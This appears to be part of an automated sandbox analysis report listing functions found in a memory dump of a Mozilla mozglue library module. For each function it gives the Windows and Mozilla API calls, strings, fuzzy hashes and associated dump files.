                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC478D4
                                                                            • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC478E9
                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6CC4795D
                                                                            • memset.VCRUNTIME140(?,00000000,00000160), ref: 6CC479BB
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CC47BBC
                                                                            • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC47C82
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC47CD2
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6CC47DAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeavememset
                                                                            • String ID:
                                                                            • API String ID: 759993129-0
                                                                            • Opcode ID: c05e73d1087b6bae17bb023aafb1cac27e38c51ff75aaf9fc93aa02132971b2f
                                                                            • Instruction ID: de31c2ff16b41d6fbe935adb9dc5b39ea4c470711c546b6f19300ba7a1f42f6c
                                                                            • Opcode Fuzzy Hash: c05e73d1087b6bae17bb023aafb1cac27e38c51ff75aaf9fc93aa02132971b2f
                                                                            • Instruction Fuzzy Hash: D8023E71E0121A8FDB54CF59C984799B7B5FF88318F25C2AAD809A7751E730AE91CF80
                                                                            Function 6CC75190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC751DF
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC7529C
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6CC752FF
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC7536D
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6CC753F7
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6CC756C3
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC756E0
                                                                            Strings
                                                                            • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6CC756BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                            • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                            • API String ID: 1227157289-345010206
                                                                            • Opcode ID: 0c38fbd5820da571e058bb01c79ab93d0f5b58dfd4fd1ef7188c45a07bad91a8
                                                                            • Instruction ID: 10cce13f1c5ce48694b254df641a6b32b60ef1b26413e96776dddeb07509c8ac
                                                                            • Opcode Fuzzy Hash: 0c38fbd5820da571e058bb01c79ab93d0f5b58dfd4fd1ef7188c45a07bad91a8
                                                                            • Instruction Fuzzy Hash: 55E19271914F45CAC722CF35885026BB7B5FF9B394F109B0EE8AB2A950EF30E4468751
                                                                            Function 6CC97030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32 ref: 6CC97046
                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6CC97060
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC9707E
                                                                              • Part of subcall function 6CC481B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC481DE
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC97096
                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC9709C
                                                                            • LocalFree.KERNEL32(?), ref: 6CC970AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                            • String ID: ### ERROR: %s: %s$(null)
                                                                            • API String ID: 2989430195-1695379354
                                                                            • Opcode ID: 18d57eb4f3de29e0856464fe28bb92943cb975df8556b58ad2d8d51f5921caf6
                                                                            • Instruction ID: 8124e094ee603de008e810359ef376fae09ef820a0fb28981a9df2d671c5d74c
                                                                            • Opcode Fuzzy Hash: 18d57eb4f3de29e0856464fe28bb92943cb975df8556b58ad2d8d51f5921caf6
                                                                            • Instruction Fuzzy Hash: 5D01B9B1A00108AFDF00ABE4DC9ADAF7BBCEF49254F010435FA05E3241E6716914CBA5
                                                                            Function 6CC82C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC82C31
                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC82C61
                                                                              • Part of subcall function 6CC34DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                              • Part of subcall function 6CC34DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC82C82
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC82E2D
                                                                              • Part of subcall function 6CC481B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC481DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                            • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                            • API String ID: 801438305-4149320968
                                                                            • Opcode ID: d385ce8aeefbdc44acded72305fb4ba73eb3d42deb6f7f9680d228b9c214f0c0
                                                                            • Instruction ID: 77f7c8d2a811920f5dbfdac0801bb89fbc501b3e29dd3f1148780d1efb9f4057
                                                                            • Opcode Fuzzy Hash: d385ce8aeefbdc44acded72305fb4ba73eb3d42deb6f7f9680d228b9c214f0c0
                                                                            • Instruction Fuzzy Hash: ED91E0B06097408FD724CF24C4A869FBBE1AFC9358F14491EE99A87751FB30D949CB52
                                                                            Function 6CC99E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldiv__aullrem
                                                                            • String ID: -Infinity$NaN
                                                                            • API String ID: 3839614884-2141177498
                                                                            • Opcode ID: 88987848f3a063f64a5a10850f761dd4747f3cc86f78c739310f5c0f1aba7dd5
                                                                            • Instruction ID: ab6bdadffe1cd4a29a4aa2c99262c168c13e6353f6d973d07d4c9d313f69a4b5
                                                                            • Opcode Fuzzy Hash: 88987848f3a063f64a5a10850f761dd4747f3cc86f78c739310f5c0f1aba7dd5
                                                                            • Instruction Fuzzy Hash: 3AC1A131E04319CFDB14CFA9C89079EB7B6FF88714F144529D406ABB80EB71A949CB91
                                                                            Function 6CC9B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC49B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6CC9B92D), ref: 6CC49BC8
                                                                              • Part of subcall function 6CC49B80: __Init_thread_footer.LIBCMT ref: 6CC49BDB
                                                                            • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CC403D4,?), ref: 6CC9B955
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC9B9A5
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC9BA20
                                                                            • RtlNtStatusToDosError.NTDLL ref: 6CC9BA7B
                                                                            • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6CC9BA81
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6CC9BA86
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                            • String ID:
                                                                            • API String ID: 1753913139-0
                                                                            • Opcode ID: 3c0721a34068e16de21f10f82da48cac9db6571cd9dc1a909f8d6d4efbb4e78d
                                                                            • Instruction ID: 298164241081a63215a8f88014077f3672320712cbe7e616001a6955ee484ac4
                                                                            • Opcode Fuzzy Hash: 3c0721a34068e16de21f10f82da48cac9db6571cd9dc1a909f8d6d4efbb4e78d
                                                                            • Instruction Fuzzy Hash: 3D515F71E01219EFDF24CFA9D994ADDB7B6AF88314F154129E901B7704EB30AD868B90
                                                                            Function 6CC78AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                              • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78BD5
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78C3A
                                                                            • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78C74
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78CBA
                                                                            • free.MOZGLUE(?), ref: 6CC78CCF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                            • String ID:
                                                                            • API String ID: 2153970598-0
                                                                            • Opcode ID: b1d5c0fa925432108f5ca9dc53e2b7a9f15127c98f0a8fae8bedb1ce11857436
                                                                            • Instruction ID: c0d585bdce678feb24f3386adc40f584f1c39088f97c0c8fa341d8dca8ca1a3f
                                                                            • Opcode Fuzzy Hash: b1d5c0fa925432108f5ca9dc53e2b7a9f15127c98f0a8fae8bedb1ce11857436
                                                                            • Instruction Fuzzy Hash: CB718D75A14B008FD714CF29C480A5AB7F1FF99318F558A5EE9899B722F770E884CB41
                                                                            Function 6CC3F280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC3F2B4
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6CC3F2F0
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC3F308
                                                                            • RtlNtStatusToDosError.NTDLL ref: 6CC3F36B
                                                                            • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6CC3F371
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                            • String ID:
                                                                            • API String ID: 1171715205-0
                                                                            • Opcode ID: e79293dfd7489ec129475506178e5b8476a6904c26ff159ede1fb511f247a457
                                                                            • Instruction ID: 2cc22a683bdbbd06526de5443faea9543726e00d0518af7ce36bc2beec93f2a8
                                                                            • Opcode Fuzzy Hash: e79293dfd7489ec129475506178e5b8476a6904c26ff159ede1fb511f247a457
                                                                            • Instruction Fuzzy Hash: ED21F530B40319DFEB508A91ED54BEF76B8AB0435CF101669E5289A580F774988CC760
                                                                            Function 6CCA53C8 Relevance: 6.6, APIs: 5, Instructions: 310COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA86AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            • Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                            • Instruction ID: 90134d481d8ee2ca07bb6f8e27f3d7eb3774d5f531483665de0b4357621f1713
                                                                            • Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                            • Instruction Fuzzy Hash: FFC1D672A0011B8FDB14CFA8CC95BEDB7B2EF85314F1442A9C549EB755E730A986CB90
                                                                            Function 6CCA545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA8A4B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                            • Instruction ID: 16dbecf4110f77ee0d11a7f09f5a8c2795f6cacc94bf472449b708c0bdb53d65
                                                                            • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                            • Instruction Fuzzy Hash: 93B1E772E0121B8FDB14CFA8CC95B99B7B2FF85314F1442A9C549DB791E7309986CB90
                                                                            Function 6CCA542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA88F0
                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA925C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                            • Instruction ID: 403cc8438c9d6344da7280d9925acda44dd7f54a54e1b9944efca034669d9211
                                                                            • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                            • Instruction Fuzzy Hash: 42B1D672E0110B8FDB14CF98CC95AADB7B2EF84314F144269C549DBB95E731A98ACB90
                                                                            Function 6CCA50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCA8E18
                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA925C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                            • Instruction ID: 67aecc2a34470d7db9565864bf623d754237ad6538d1d6d206fed0fafd9e6941
                                                                            • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                            • Instruction Fuzzy Hash: C8A1E972E001178FCB14CF98CC95B99B7B2EF85314F1442B9C949DB785E731A99ACB90
                                                                            Function 6CC877A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC87A81
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC87A93
                                                                              • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                              • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC87AA1
                                                                              • Part of subcall function 6CC55C50: __aulldiv.LIBCMT ref: 6CC55DB4
                                                                              • Part of subcall function 6CC55C50: LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                            • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CC87B31
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                            • String ID:
                                                                            • API String ID: 4054851604-0
                                                                            • Opcode ID: fec2ce6aca0a4b55e8746976372f91eedc43dfa23ec190df97acf15f78fd2d66
                                                                            • Instruction ID: bd75fdb6a6f6ac53edce3555c5069d78ace88698e5a885d2caaad1225ef9fa66
                                                                            • Opcode Fuzzy Hash: fec2ce6aca0a4b55e8746976372f91eedc43dfa23ec190df97acf15f78fd2d66
                                                                            • Instruction Fuzzy Hash: C8B18D357093848BCB14CF64C05069FBBE2ABC531CF154A1CE99567B91FB70E90ADB82
                                                                            Function 6CC9B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtQueryVirtualMemory.NTDLL ref: 6CC9B720
                                                                            • RtlNtStatusToDosError.NTDLL ref: 6CC9B75A
                                                                            • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6CC6FE3F,00000000,00000000,?,?,00000000,?,6CC6FE3F), ref: 6CC9B760
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                            • String ID:
                                                                            • API String ID: 304294125-0
                                                                            • Opcode ID: 69602cdc0b1d0e29140f1454348b50086523ef860cf579d2745ad6e8c1d4e294
                                                                            • Instruction ID: 5d15ee3e7e3c4228bc50bc9e71f681a6e3b29077ee66b0fdb3e494a2e711cfb8
                                                                            • Opcode Fuzzy Hash: 69602cdc0b1d0e29140f1454348b50086523ef860cf579d2745ad6e8c1d4e294
